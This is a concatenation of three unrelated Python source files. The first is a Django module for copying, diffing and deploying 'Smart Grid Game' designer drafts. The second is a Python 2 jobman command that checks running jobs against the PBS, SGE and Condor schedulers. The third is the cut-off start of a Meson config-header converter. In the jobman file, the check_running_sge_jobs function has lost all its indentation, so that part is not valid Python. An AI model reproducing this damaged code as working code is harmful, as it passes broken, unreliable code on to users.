    # Clear the pk/id so save() inserts a new row instead of updating.
    obj.pk = None
    obj.id = None
    obj.save()
    # Copy all the LibraryTextPropmtQuestions
    for question in LibraryTextPromptQuestion.objects.filter(libraryaction=action):
        try:
            des_obj = get_object_or_404(LibraryTextPromptQuestion, action=obj, \
                                        question=question.question, answer=question.answer)
        except Http404:
            des_obj = LibraryTextPromptQuestion()
        _copy_fields_no_foriegn_keys(question, des_obj)
        des_obj.action = obj
        des_obj.save()
    return obj
def copy_draft(from_draft, to_draft):
    """Copy every designer object in from_draft into to_draft.

    to_draft is cleared first; then DesignerLevels, DesignerColumnNames,
    DesignerColumnGrid placements, DesignerActions (with their text prompt
    questions) and DesignerGrid placements are duplicated.  Returns to_draft.
    """
    clear_designer(to_draft)
    # levels
    for level in DesignerLevel.objects.filter(draft=from_draft):
        copy = DesignerLevel(draft=to_draft)
        _copy_fields_no_foriegn_keys(level, copy)
        copy.save()
    # ColumnNames
    for column in DesignerColumnName.objects.filter(draft=from_draft):
        copy = DesignerColumnName(draft=to_draft)
        _copy_fields_no_foriegn_keys(column, copy)
        copy.save()
    # DesignerColumnGrid
    for loc in DesignerColumnGrid.objects.filter(draft=from_draft):
        level = get_designer_level(to_draft, loc.level.slug)
        column = get_designer_column_name(to_draft, loc.name.slug)
        copy = DesignerColumnGrid(draft=to_draft, name=column, level=level)
        _copy_fields_no_foriegn_keys(loc, copy)
        copy.save()
    # DesignerActions
    for action in DesignerAction.objects.filter(draft=from_draft):
        # Re-fetch to get the concrete subclass instance.
        action = get_designer_action(from_draft, action.slug)
        if action.type == 'activity':
            copy = DesignerActivity(draft=to_draft)
        elif action.type == 'commitment':
            copy = DesignerCommitment(draft=to_draft)
        elif action.type == 'event':
            copy = DesignerEvent(draft=to_draft)
        elif action.type == 'filler':
            # Bug fix: fillers were previously unhandled, so a filler action
            # reused the prior iteration's 'copy' (or raised NameError).
            copy = DesignerFiller(draft=to_draft)
        _copy_fields_no_foriegn_keys(action, copy)
        copy.save()
        # Copy all the DesignerTextPromptQuestions
        for question in DesignerTextPromptQuestion.objects.filter(action=action, draft=from_draft):
            des_obj = DesignerTextPromptQuestion(action=copy, draft=to_draft)
            _copy_fields_no_foriegn_keys(question, des_obj)
            des_obj.save()
    # DesignerGrid
    for loc in DesignerGrid.objects.filter(draft=from_draft):
        level = get_designer_level(to_draft, loc.level.slug)
        action = get_designer_action(to_draft, loc.action.slug)
        copy = DesignerGrid(level=level, draft=to_draft, action=action)
        _copy_fields_no_foriegn_keys(loc, copy)
        copy.save()
    return to_draft
def copy_designer_action(draft, slug):
    """Duplicate the DesignerAction with the given slug inside *draft*.

    The copy gets the next free copy slug (prefix plus copy number) and its
    text prompt questions are duplicated too.  Returns the saved copy.
    """
    action = get_designer_action(draft, slug)
    action_type = action.type
    if action_type == 'activity':
        obj = DesignerActivity()
    elif action_type == 'commitment':
        obj = DesignerCommitment()
    elif action_type == 'event':
        obj = DesignerEvent()
    elif action_type == 'filler':
        # Bug fix: fillers were previously unhandled, leaving 'obj' unbound
        # and raising NameError when copying a filler action.
        obj = DesignerFiller()
    _copy_fields(action, obj)
    copy_slug = __get_next_designer_copy_slug(draft, slug)
    obj.slug = copy_slug
    # Clear the pk/id so save() inserts a new row instead of updating.
    obj.pk = None
    obj.id = None
    obj.save()
    # Copy all the DesignerTextPromptQuestions
    for question in DesignerTextPromptQuestion.objects.filter(action=action, draft=draft):
        des_obj = DesignerTextPromptQuestion()
        _copy_fields_no_foriegn_keys(question, des_obj)
        des_obj.action = obj
        des_obj.draft = draft
        des_obj.save()
    return obj
def get_designer_action(draft, slug):
    """Return the concrete Smart Grid Game Designer action for the given
    draft and slug, or raise Http404 when no DesignerAction matches."""
    action = get_object_or_404(DesignerAction, draft=draft, slug=slug)
    concrete = {
        'activity': DesignerActivity,
        'commitment': DesignerCommitment,
        'event': DesignerEvent,
        'filler': DesignerFiller,
    }.get(action.type)
    if concrete is not None:
        return concrete.objects.get(draft=draft, slug=slug)
    return action
def get_designer_action_slugs(draft):
    """Return the slugs of every DesignerAction in the given draft,
    including actions still in the palette."""
    return [action.slug for action in DesignerAction.objects.filter(draft=draft)]
def get_designer_column_name(draft, slug):
    """Return the Smart Grid Game DesignerColumnName for the given slug.
    Raises Http404 when no match exists for the draft."""
    return get_object_or_404(DesignerColumnName, draft=draft, slug=slug)
def get_designer_column_name_slugs(draft):
    """Return the slugs of the DesignerColumnNames currently placed in the
    Smart Grid Designer for the given draft."""
    return [entry.name.slug for entry in DesignerColumnGrid.objects.filter(draft=draft)]
def get_designer_draft(slug):
    """Returns the Draft for the given slug or Http404 exception."""
    return get_object_or_404(Draft, slug=slug)
def get_designer_level(draft, slug):
    """Return the DesignerLevel for the given slug.
    Raises Http404 when no match exists for the draft."""
    return get_object_or_404(DesignerLevel, draft=draft, slug=slug)
def get_designer_levels(draft):
    """Return a queryset of the DesignerLevels for the given draft."""
    return DesignerLevel.objects.filter(draft=draft)
def get_designer_test_levels(draft, user):
    """Returns a list of DesignerLevels with their unlock conditions set according to the
    test predicates."""
    # NOTE(review): this iterates the deployed Level objects, not
    # DesignerLevel, despite the docstring -- confirm whether that is
    # intentional for play-testing against the live grid.
    levels = []
    for level in Level.objects.all():
        # Evaluate the level's unlock condition with the play-tester
        # predicate evaluator and stash the result on the instance.
        level.is_unlock = predicate_mgr.eval_play_tester_predicates(level.unlock_condition,
                                                                    user, draft)
        levels.append(level)
    return levels
def get_library_action(slug):
    """Return the concrete Smart Grid Game Library action for the given
    slug, or raise Http404 when no LibraryAction matches."""
    action = get_object_or_404(LibraryAction, slug=slug)
    concrete = {
        'activity': LibraryActivity,
        'commitment': LibraryCommitment,
        'event': LibraryEvent,
    }.get(action.type)
    if concrete is not None:
        return concrete.objects.get(slug=slug)
    return action
def get_library_column_name(slug):
    """Return the Smart Grid Game LibraryColumnName for the given slug.
    Raises Http404 when no match exists."""
    return get_object_or_404(LibraryColumnName, slug=slug)
def get_smartgrid_action(slug):
    """Return the concrete deployed Smart Grid action for the given slug,
    or raise Http404 when no Action matches."""
    action = get_object_or_404(Action, slug=slug)
    concrete = {
        'activity': Activity,
        'commitment': Commitment,
        'event': Event,
        'filler': Filler,
    }.get(action.type)
    if concrete is not None:
        return concrete.objects.get(slug=slug)
    return action
def get_smartgrid_action_slugs():
    """Return the distinct slugs of the Actions currently placed in the
    Smart Grid, in first-seen order."""
    seen = []
    for cell in Grid.objects.all():
        slug = cell.action.slug
        if slug not in seen:
            seen.append(slug)
    return seen
def get_smartgrid_column_name(slug):
    """Returns the ColumnName object by slug.
    Raises Http404 when no match exists."""
    return get_object_or_404(ColumnName, slug=slug)
def get_smartgrid_level(slug):
    """Returns the Level for the given slug.
    Raises Http404 when no match exists."""
    return get_object_or_404(Level, slug=slug)
def get_smartgrid():
    """Return the currently defined smart grid.

    NOTE(review): this is a stub -- it always returns an empty list.
    """
    return []
def get_designer_grid(draft):
    """Returns the smart grid as defined in the Smart Grid Designer. The
    grid is a list of lists with the format [<DesignerLevel>, [<DesignerColumnName>*],
    [<DesignerAction>*], [active columns]"""
    ret = []
    for level in DesignerLevel.objects.filter(draft=draft):
        level_ret = []
        level_ret.append(level)
        # level_ret[1]: column placements, level_ret[2]: action placements.
        level_ret.append(DesignerColumnGrid.objects.filter(draft=draft, level=level))
        level_ret.append(DesignerGrid.objects.filter(draft=draft, level=level))
        # Collect the distinct column indices used by either placement kind.
        columns = []
        for cat in level_ret[1]:
            if cat.column not in columns:
                columns.append(cat.column)
        for act in level_ret[2]:
            if act.column not in columns:
                columns.append(act.column)
        level_ret.append(columns)
        ret.append(level_ret)
    return ret
def get_designer_palette(draft):
    """Return the draft's DesignerActions that have no DesignerGrid
    placement.  These actions will not appear in the grid if published."""
    return [action for action in DesignerAction.objects.filter(draft=draft)
            if len(DesignerGrid.objects.filter(action=action)) == 0]
def clear_designer(draft):
    """Delete every designer object belonging to *draft*.  Only do this
    rarely.  Objects are deleted one by one (not via a bulk queryset
    delete) in the same order as before."""
    for model in (DesignerLevel, DesignerColumnName, DesignerAction,
                  DesignerColumnGrid, DesignerGrid):
        for obj in model.objects.filter(draft=draft):
            obj.delete()
def __clear_drafts():
    """Deletes all the Drafts and their objects. This includes the Draft 'None'."""
    for draft in Draft.objects.all():
        draft.delete()
    # Designer objects loaded from fixtures live under draft None; purge them too.
    clear_designer(draft=None)
def copy_smartgrid_to_designer(draft):
    """Copies the current Smart Grid Game to the given designer draft."""
    # Clear out the Designer
    clear_designer(draft)
    # Copy the levels
    for lvl in Level.objects.all():
        try:
            des_lvl = get_object_or_404(DesignerLevel, draft=draft, slug=lvl.slug)
        except Http404:
            des_lvl = DesignerLevel()
            des_lvl.draft = draft
        _copy_fields(lvl, des_lvl)
    # Copy the ColumnNames
    for col in ColumnName.objects.all():
        try:
            des_col = get_object_or_404(DesignerColumnName, draft=draft, slug=col.slug)
        except Http404:
            des_col = DesignerColumnName()
            des_col.draft = draft
        _copy_fields(col, des_col)
    # Copy the location information
    for grid in ColumnGrid.objects.all():
        col = DesignerColumnGrid()
        col.level = get_designer_level(draft, grid.level.slug)
        col.column = grid.column
        col.name = get_designer_column_name(draft, grid.name.slug)
        col.draft = draft
        col.save()
    # Copy the Actions
    for action in Action.objects.all():
        instantiate_designer_action_from_smartgrid(draft, action.slug)
    # Copy the location information
    for grid in Grid.objects.all():
        loc = DesignerGrid()
        loc.level = get_designer_level(draft, grid.level.slug)
        loc.column = grid.column
        loc.row = grid.row
        loc.action = get_designer_action(draft, grid.action.slug)
        loc.draft = draft
        loc.save()
def clear_smartgrid():
    """Remove all placement information for the Smart Grid: delete every
    Level, ColumnName, ColumnGrid and Grid row.  Smart Grid Actions
    themselves are untouched.  Objects are deleted one by one, in the same
    order as before."""
    for model in (Level, ColumnName, ColumnGrid, Grid):
        for obj in model.objects.all():
            obj.delete()
def deploy_designer_to_smartgrid(draft, use_filler):  # pylint: disable=R0914
    """Clears the current Smart Grid Game and copies the designer instances to the
    Smart Grid Game. Clearing the grid does not delete the actions just clears their
    Levels and Categories.

    When use_filler is True, every empty grid cell is filled with a newly
    created Filler action."""
    clear_smartgrid()
    # deploy the Levels
    for level in DesignerLevel.objects.filter(draft=draft):
        instantiate_smartgrid_level_from_designer(level)
    # deploy the ColumnNames
    for col in DesignerColumnName.objects.filter(draft=draft):
        instantiate_smartgrid_column_from_designer(col)
    # deploy the actions
    for action in DesignerAction.objects.filter(draft=draft):
        instantiate_smartgrid_action_from_designer(draft, action.slug)
    # set the ColumnGrid objects.
    for des_col in DesignerColumnGrid.objects.filter(draft=draft):
        col = ColumnGrid()
        col.column = des_col.column
        col.level = get_smartgrid_level(des_col.level.slug)
        col.name = get_smartgrid_column_name(des_col.name.slug)
        col.save()
    # set the Grid objects.
    for des_row in DesignerGrid.objects.filter(draft=draft):
        row = Grid()
        row.row = des_row.row
        row.column = des_row.column
        row.level = get_smartgrid_level(des_row.level.slug)
        row.action = get_smartgrid_action(des_row.action.slug)
        row.save()
    if use_filler:
        # need to instantiate the filler objects and put them in the grid.
        # Numbering continues after the existing fillers so names stay unique.
        filler_count = len(Filler.objects.all())
        sizes = get_smart_grid_size()
        for slug in list(sizes):
            level = Level.objects.get(slug=slug)
            # Walk every (column, row) cell of the level's bounding box and
            # fill the unoccupied ones.
            for c in range(1, sizes[slug][0] + 1):
                for r in range(1, sizes[slug][1] + 1):
                    cell = Grid.objects.filter(level=level, column=c, row=r)
                    if not cell:
                        filler_count += 1
                        name = 'Filler %s' % filler_count
                        filler_slug = 'filler-%s' % filler_count
                        filler = Filler(name=name, slug=filler_slug, type='filler', title=name)
                        filler.save()
                        grid = Grid(level=level, column=c, row=r, action=filler)
                        grid.save()  # pylint: enable=R0914
def get_smart_grid_size():
    """Returns the maximum columns and rows for each level in the smartgrid as a dictionary with
    the keys being the level slug and values being [num_column, num_row]."""
    ret = {}
    for level in Level.objects.all():
        num_column = 0
        # Column headers can extend the width beyond the placed actions.
        for grid in ColumnGrid.objects.filter(level=level):
            if grid.column > num_column:
                num_column = grid.column
        num_row = 0
        for grid in Grid.objects.filter(level=level):
            if grid.column > num_column:
                num_column = grid.column
            if grid.row > num_row:
                num_row = grid.row
        ret[level.slug] = [num_column, num_row]
    return ret
def is_diff_between_designer_and_grid_action(draft, action_slug):
    """Return True when any field of the Designer action differs from the
    deployed Grid action with the given slug.

    Foreign keys (except parent-link *_ptr fields) are compared by the
    target object's name; all other fields except 'id' are compared
    directly.
    """
    grid = get_smartgrid_action(action_slug)
    designer = get_designer_action(draft, action_slug)
    fks = []
    for f in grid._meta.fields:
        if isinstance(f, ForeignKey):
            fks.append(f.name)
    for f in grid._meta.fields:
        if f.name in fks:
            if not f.name.endswith('_ptr'):
                # Bug fix: guard null FKs before dereferencing .name, the
                # same way diff_between_designer_and_grid_action() does;
                # previously a null FK raised AttributeError here.
                grid_val = getattr(grid, f.name)
                if grid_val:
                    grid_val = grid_val.name
                designer_val = getattr(designer, f.name)
                if designer_val:
                    designer_val = designer_val.name
                if grid_val != designer_val:
                    return True
        elif f.name != 'id':
            grid_val = getattr(grid, f.name)
            designer_val = getattr(designer, f.name)
            if grid_val != designer_val:
                return True
    return False
def diff_between_designer_and_grid_action(draft, action_slug):  # pylint: disable=R0912
    """Returns a list of the fields that are different between the Designer Action and
    Grid Action with the given slug."""
    grid = None
    designer = None
    # 't' tracks the most specific type string known when a lookup 404s.
    t = 'action'
    try:
        designer = get_designer_action(draft, action_slug)
        t = designer.type
        grid = get_smartgrid_action(action_slug)
        t = grid.type
        fks = []
        for f in grid._meta.fields:
            if isinstance(f, ForeignKey):
                fks.append(f.name)
    except Http404:
        # One side is missing entirely; report which.
        if grid == None:
            return ['is new ' + t + ' in grid']
        if designer == None:
            return ['not in designer but is in grid']
    diff = []
    # Field-by-field comparison: FKs (except parent links) by target name,
    # everything else except 'id' by value.
    for f in grid._meta.fields:
        if f.name in fks:
            if not f.name.endswith('_ptr'):
                grid_val = getattr(grid, f.name)
                if grid_val:
                    grid_val = grid_val.name
                designer_val = getattr(designer, f.name)
                if designer_val:
                    designer_val = designer_val.name
                if grid_val != designer_val:
                    diff.append(f.name)
        elif f.name != 'id':
            grid_val = getattr(grid, f.name)
            designer_val = getattr(designer, f.name)
            if grid_val != designer_val:
                diff.append(f.name)
    # Placement comparison: report level/column/row moves and moves
    # to/from the palette.
    des_loc = DesignerGrid.objects.filter(action=designer)
    grid_loc = Grid.objects.filter(action=grid)
    if len(des_loc) == 1 and len(grid_loc) == 1:
        if des_loc[0].level.slug != grid_loc[0].level.slug:
            diff.append("moved from level %s to %s" % (grid_loc[0].level, des_loc[0].level))
        if des_loc[0].column != grid_loc[0].column:
            diff.append("column changed from %s to %s" % (grid_loc[0].column, des_loc[0].column))
        if des_loc[0].row != grid_loc[0].row:
            diff.append("row changed from %s to %s" % (grid_loc[0].row, des_loc[0].row))
    if len(des_loc) == 1 and len(grid_loc) == 0:
        diff.append("moved to %s from the palette" % des_loc[0].get_loc_str())
    if len(des_loc) == 0 and len(grid_loc) == 1:
        diff.append("moved out of the grid to the palette")
    return diff  # pylint: enable=R0912
def diff_between_designer_and_grid(draft):
    """Returns a list of the action slugs and the changes for those slugs between the
    designer actions and smartgrid actions.

    Each entry is [admin-link HTML for the action, list of differences]."""
    ret = []
    for action in DesignerAction.objects.filter(draft=draft):
        slug = action.slug
        diff = diff_between_designer_and_grid_action(draft, slug)
        if len(diff) > 0:
            inner = []
            inner.append(_admin_link(action))
            inner.append(diff)
            ret.append(inner)
    return ret
def load_example_grid(draft, example_name):
    """Loads the Designer with the given example grid. If example_name doesn't exist, nothing
    is changed."""
    # print "load_example_grid(%s, %s)" % (draft, example_name)
    # manage_py = script_utils.manage_py_command()
    # manage_command = "python " + manage_py
    fixture_path = "fixtures"
    loaded = False
    # Check to see if there is an example.
    for name in os.listdir(fixture_path):
        if name.startswith(example_name) and name.endswith("_designer.json"):
            # examples exists so clear the designer
            clear_designer(draft)
            # load the example
            fixture = os.path.join(fixture_path, name)
            call_command('loaddata', '-v 0', fixture)
            loaded = True
            # os.system("%s loaddata -v 0 %s" % (manage_command, fixture))
    if loaded:
        # Fixtures load under draft None, so copy everything from None to
        # the requested draft.
        copy_draft(from_draft=None, to_draft=draft)
        # clear_designer(draft=None)
|
|
from subprocess import Popen, PIPE
import os
import re
import time
from optparse import OptionParser
import sql
from runner import runner_registry
from tools import UsageError
from api0 import open_db
# Option parser for the `jobman check <tablepath>` sub-command; registered
# with runner_registry at the bottom of this module.
parse_check = OptionParser(usage='%prog check <tablepath> ',
                           add_help_option=False)
def str_time(run_time):
    """Format a duration in seconds as 'Dd HhMmSs' (e.g. 90061 -> '1d 1h1m1s')."""
    days, remainder = divmod(run_time, 24 * 3600)
    hours, remainder = divmod(remainder, 3600)
    minutes, seconds = divmod(remainder, 60)
    return "%dd %dh%dm%ds" % (days, hours, minutes, seconds)
def check_running_pbs_jobs(r, now):
    """ Verify jobs on Torque/PBS system.

    r is the db row for a job marked running; now is the current unix time.
    Prints E:/W: diagnostics to stdout; returns nothing."""
    # Ask PBS for the job's full XML status record.
    p = Popen('qstat -x %s' % r['jobman.sql.pbs_task_id'],
              shell=True, stdout=PIPE, stderr=PIPE)
    ret = p.wait()
    out = p.stdout.read()
    if len(out) == 0:
        print ("E: Job %d marked as PBS job '%s',"
               " but 'qstat' don't know it." % (
                   r.id, r['jobman.sql.pbs_task_id']))
        return
    run_time = str_time(now - r["jobman.sql.start_time"])
    # check runtime
    #<walltime>48:00:00</walltime>
    ressource_str = re.search('<Resource_List>.*</Resource_List>',
                              out).group(0)
    walltime_str = re.search('<walltime>.*?</walltime>', ressource_str)
    walltime_str = walltime_str.group(0)[10:-11]
    # Walltime is expected as HH:MM:SS.
    assert walltime_str[2] == ':' and walltime_str[5] == ':'
    walltime = (int(walltime_str[:2]) * 60 * 60 +
                int(walltime_str[3:5]) * 60 +
                int(walltime_str[-2:]))
    if now - int(r["jobman.sql.start_time"]) > walltime:
        print ("W: Job %d is running for more then the specified"
               " max time of %s. Run time %s" % (
                   r.id, walltime_str, run_time))
    # check state
    #<job_state>R</job_state>
    state_str = re.search('<job_state>.*</job_state>', out).group(0)[11:-12]
    if state_str == "R":
        pass
    elif state_str == "Q":
        print ("E: Job %d is running in the db on pbs with job id %s, but it"
               " is in the pbs queue. Run time %s" % (
                   r.id, r["jobman.sql.pbs_task_id"], run_time))
    elif state_str == "C":
        print ("W: Job %d is running in the db, but it is marked as completed"
               " in the pbs queue. This can be synchonization issue. Retry in"
               " 1 minutes. Run time %s." % (r.id, run_time))
    else:
        print ("W: Job %d is running in the db, but we don't understand the"
               " state in the queue '%s'" % (r.id, state_str))
def check_running_sge_jobs(r, now):
p = Popen('qstat', shell=True, stdout=PIPE)
ret = p.wait()
lines = p.stdout.readlines()
"""
qstat output:
job-ID prior name user state submit/start at queue slots ja-task-ID
-----------------------------------------------------------------------------------------------------------------
776410 0.50000 dbi_6a5f45 bastienf r 10/18/2010 13:26:46 smp@r106-n72 1 1
776410 0.50000 dbi_6a5f45 bastienf r 10/18/2010 13:26:46 smp@r106-n72 1 2
776415 0.00000 dbi_5381a1 bastienf qw 10/18/2010 13:30:21 1 1,2
"""
if len(lines) == 0:
print "E: Job %d marked as a SGE job, but `qstat` on this host tell that their is no job running." % r.id
return
assert lines[
0] == 'job-ID prior name user state submit/start at queue slots ja-task-ID \n'
assert lines[
1] == '-----------------------------------------------------------------------------------------------------------------\n'
run_time = str_time(now - r["jobman.sql.start_time"])
if now - int(r["jobman.sql.start_time"]) > (24 * 60 * 60):
print "W: Job %d is running for more then 24h. The current colosse max run time is 24h. Run time %s" % (r.id, run_time)
found = False
for line in lines[2:]:
sp = line.split()
ta_sp = sp[9].split(',')
if len(sp) != 10:
print "W: Job %d. Don't understant one line of qstat output's. Can't tell reliably if it is still running or not" % r.id
print "qstat output: ", line
if (sp[0] == r["jobman.sql.job_id"] and
r["jobman.sql.sge_task_id"] in ta_sp):
if sp[4] == 'r':
pass
elif sp[4] == 'qw':
print "E: Job %d is running in the db on sge with job id %s and task id %s, but it is waiting in the sge queue. Run time %s" % (
r.id, r["jobman.sql.job_id"],
r["jobman.sql.sge_task_id"], run_time)
elif sp[4] == 't':
print "W: Job %d is running in the db, but it is marked as ended in the sge queue. This can be synchonization issue. Retry in 1 minutes. Run time %s." % (
r.id, run_time)
else:
print "W: Job %d is running in the db and in the sge queue, but we don't understant the state it is in the queue:", sp[4]
found = True # in the sge queue
break
if not found:
print "E: Job %d marked as running in the db on sge with job id %s and task id %s, but not in sge queue. Run time %s." % (
r.id, r["jobman.sql.job_id"],
r["jobman.sql.sge_task_id"], run_time)
def check_serve(options, dbdescr):
    """Check that all jobs marked as running in the db are marked as
    running in some cluster jobs scheduler.

    print jobs that could have crashed/been killed ...

    Example usage:

        jobman check <tablepath>
    """
    db = open_db(dbdescr, serial=True)
    try:
        session = db.session()
        q = db.query(session)
        # Bucket all jobs by jobman status code.
        idle = q.filter_eq('jobman.status', 0).all()
        running = q.filter_eq('jobman.status', 1).all()
        finished = q.filter_eq('jobman.status', 2).all()
        err_start = q.filter_eq('jobman.status', 3).all()
        err_sync = q.filter_eq('jobman.status', 4).all()
        err_run = q.filter_eq('jobman.status', 5).all()
        canceled = q.filter_eq('jobman.status', -1).all()
        info = []
        print ("I: number of job by status (%d:START, %d:RUNNING, %d:DONE,"
               " %d:ERR_START, %d:ERR_SYNC, %d:ERR_RUN, %d:CANCELED)"
               " in the db (%d:TOTAL)" % (len(idle), len(running),
                                          len(finished), len(err_start),
                                          len(err_sync), len(err_run),
                                          len(canceled), len(q.all())))
        print
        # warn about job in error status
        if len(err_start):
            print "E: The following jobs had an error when starting them",
            print [j.id for j in err_start]
        if len(err_sync):
            print "E: The following jobs had an error while doing the rsync",
            print [j.id for j in err_sync]
        if len(err_run):
            print "E: The following jobs had an error while running",
            print [j.id for j in err_run]
        print
        # check not 2 jobs in same slot+host
        host_slot = {}
        now = time.time()
        # check job still running
        for idx, r in enumerate(running):
            condor_job = False
            sge_job = False
            pbs_job = False
            # find the backend used for the job.
            if ("jobman.sql.condor_slot" in r.keys() and
                    r["jobman.sql.condor_slot"] != "no_condor_slot"):
                condor_job = True
            if "jobman.sql.sge_task_id" in r.keys():
                sge_job = True
            if "jobman.sql.pbs_task_id" in r.keys():
                pbs_job = True
            # Exactly one backend must be identified; otherwise skip the job.
            if (sge_job + condor_job + pbs_job) > 1:
                print "W: Job %d have info such that it run on condor, sge and/or pbs. We can't determine the good one."
                continue
            if not (sge_job or condor_job or pbs_job):
                print "W: Job %d don't have condor, sge or pbs info attached to it. We can't determine if it is still running on the cluster. Old jobman to started the job?" % r.id
                continue
            # check that the job is still running.
            if sge_job:
                check_running_sge_jobs(r, now)
                continue
            if pbs_job:
                check_running_pbs_jobs(r, now)
                continue
            if not condor_job:
                print "W: Job %d is running but don't have the information needed to check if they still run on the jobs scheduler condor/pbs/torque/sge. Possible reasons: the job started with an old version of jobman or on another jobs scheduler." % r.id
                continue
            # We suppose the jobs started on condor.
            try:
                h = r["jobman.sql.host_name"]
                s = r["jobman.sql.condor_slot"]
            except KeyError, e:
                print "W: Job %d is running but don't have needed info to check them again condor. Possible reaons: the job started with an old version of jobman or without condor." % r.id
                continue
            # Flag two db-running jobs claiming the same slot@host.
            st = s + '@' + h
            if host_slot.has_key(st):
                try:
                    t0 = str_time(
                        now - running[host_slot[st]]["jobman.sql.start_time"])
                except KeyError:
                    t0 = 'NO_START_TIME'
                try:
                    t1 = str_time(now - r["jobman.sql.start_time"])
                except KeyError:
                    t1 = 'NO_START_TIME'
                print 'E: Job %d and Job %d are running on the same condor slot/host combination. running time: %s and %s' % (running[host_slot[st]].id, r.id, t0, t1)
            else:
                host_slot[st] = idx
            # Query condor_q by global job id when the row recorded one.
            gjid = None
            if "jobman.sql.condor_global_job_id" in r.keys():
                gjid = r["jobman.sql.condor_global_job_id"]
            elif "jobman.sql.condor_GlobalJobId" in r.keys():
                gjid = r["jobman.sql.condor_GlobalJobId"]
            if gjid is not None:
                submit_host = gjid.split('#')[0]
                #import pdb;pdb.set_trace()
                # take care of the quotation, condor resquest that "" be used
                # around string.
                cmd = "condor_q -name %s -const 'GlobalJobId==\"%s\"' -format '%%s' 'JobStatus'" % (
                    submit_host, gjid)
                p = Popen(cmd, shell=True, stdout=PIPE)
                ret = p.wait()
                lines = p.stdout.readlines()
                if ret == 127 and len(lines) == 0:
                    print "W: Job %d. condor_q failed. Is condor installed on this computer?" % r.id
                    continue
                if len(lines) == 0:
                    print "E: Job %d is marked as running in the bd on this condor jobs %s, but condor tell that this jobs is finished" % (r.id, gjid)
                    continue
                elif len(lines) == 1:
                    # condor unexpanded??? What should we do?
                    if lines[0] == '0':
                        print "E: Job %d is marked as running in the db, but its condor submited job is marked as unexpanded. We don't know what that mean, so we use an euristic to know if the jobs is still running." % r.id
                    elif lines[0] == '1':  # condor idle
                        print "E: Job %d is marked as running in the db, but its condor submited job is marked as idle. This can mean that the computer that was running this job crashed." % r.id
                        continue
                    elif lines[0] == '2':  # condor running
                        continue
                    elif lines[0] == '3':  # condor removed
                        print "E: Job %d is marked as running in the db, but its condor submited job is marked as removed." % r.id
                    elif lines[0] == '4':  # condor completed
                        print "E: Job %d is marked as running in the db, but its condor submited job is marked as completed." % r.id
                    elif lines[0] == '5':  # condor held
                        print "E: Job %d is marked as running in the db, but its condor submited job is marked as held." % r.id
                    elif lines[0] == '6':  # condor submission error
                        print "E: Job %d is marked as running in the db, but its condor submited job is marked as submission error(SHOULD not happen as if condor can't start the job, it don't select one in the db)." % r.id
                    else:
                        print "W: condor return a not understood answer to a query. We will try some euristic to determine if it is running. test command `%s`. stdout returned `%s`" % (cmd, lines)
            # except KeyError:
            #     pass
            # Fall back to condor_status against the recorded slot/host.
            info = (r.id,
                    r["jobman.experiment"],
                    r["jobman.sql.condor_slot"],
                    r["jobman.sql.host_name"],
                    r["jobman.sql.start_time"])
            run_time = str_time(now - info[4])
            if info[2] == "no_condor_slot":
                print "W: Job %d is not running on condor(Should not happed...)" % info[0]
            else:
                p = Popen('''condor_status -constraint 'Name == "slot%s@%s"' -format "%%s" Name -format " %%s" State -format " %%s" Activity -format " %%s" RemoteUser -format " %%s\n" RemoteOwner''' % (info[2], info[3]),
                          shell=True, stdout=PIPE)
                p.wait()
                lines = p.stdout.readlines()
                # return when running: slot1@brams0b.iro.umontreal.ca Claimed Busy bastienf bastienf
                # return when don't exist: empty
                if len(lines) == 0:
                    print "W: Job %d is running on a host(%s) that condor lost connection with. The job run for: %s" % (r.id, info[3], run_time)
                    continue
                elif len(lines) != 1 and not (len(lines) == 2 and lines[-1] == '\n'):
                    print "W: Job %d condor_status return not understood: ", lines
                    continue
                sp = lines[0].split()
                if len(sp) >= 3 and sp[1] in ["Unclaimed", "Owner"] and sp[2] == "Idle":
                    print "E: Job %d db tell that this job is running on %s. condor tell that this host don't run a job. running time %s" % (r.id, info[3], run_time)
                elif len(sp) == 5:
                    assert sp[0] == "slot%s@%s" % (info[2], info[3])
                    if sp[3] != sp[4]:
                        print "W: Job %d condor_status return not understood: ", lines
                    if sp[1] == "Claimed" and sp[2] in ["Busy", "Retiring"]:
                        if sp[4].split('@')[0] == os.getenv("USER"):
                            print "W: Job %d is running on a condor host that is running a job of the same user. running time: %s" % (r.id, run_time)
                        else:
                            print "E: Job %d is running on a condor host that is running a job for user %s. running time: %s" % (r.id, sp[4].split('@')[0], run_time)
                    else:
                        print "W: Job %d condor state of host not understood" % r.id, sp
                else:
                    print "W: Job %d condor_status return not understood: ", lines
    finally:
        session.close()
# Register the `check` sub-command (parser + handler) with jobman's runner.
runner_registry['check'] = (parse_check, check_serve)
|
|
#!/usr/bin/env python3
# Copyright 2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Usage text for this converter; '{}' is filled in with the program name.
help_message = """Usage: {} <config.h.meson>
This script reads config.h.meson, looks for header
checks and writes the corresponding meson declaration.
Copy config.h.in to config.h.meson, replace #undef
with #mesondefine and run this. We can't do this automatically
because some configure scripts have #undef statements
that are unrelated to configure checks.
"""
import sys
# Add stuff here as it is encountered.
# Maps a HAVE_* config macro to (function name, declaring header); each pair
# is emitted below as a cc.has_function() check with an #include prefix.
function_data = \
    {'HAVE_FEENABLEEXCEPT': ('feenableexcept', 'fenv.h'),
     'HAVE_FECLEAREXCEPT': ('feclearexcept', 'fenv.h'),
     'HAVE_FEDISABLEEXCEPT': ('fedisableexcept', 'fenv.h'),
     'HAVE_MMAP': ('mmap', 'sys/mman.h'),
     'HAVE_GETPAGESIZE': ('getpagesize', 'unistd.h'),
     'HAVE_GETISAX': ('getisax', 'sys/auxv.h'),
     'HAVE_GETTIMEOFDAY': ('gettimeofday', 'sys/time.h'),
     'HAVE_MPROTECT': ('mprotect', 'sys/mman.h'),
     'HAVE_POSIX_MEMALIGN': ('posix_memalign', 'stdlib.h'),
     'HAVE_SIGACTION': ('sigaction', 'signal.h'),
     'HAVE_ALARM': ('alarm', 'unistd.h'),
     'HAVE_CTIME_R': ('ctime_r', 'time.h'),
     'HAVE_DRAND48': ('drand48', 'stdlib.h'),
     'HAVE_FLOCKFILE': ('flockfile', 'stdio.h'),
     'HAVE_FORK': ('fork', 'unistd.h'),
     'HAVE_FUNLOCKFILE': ('funlockfile', 'stdio.h'),
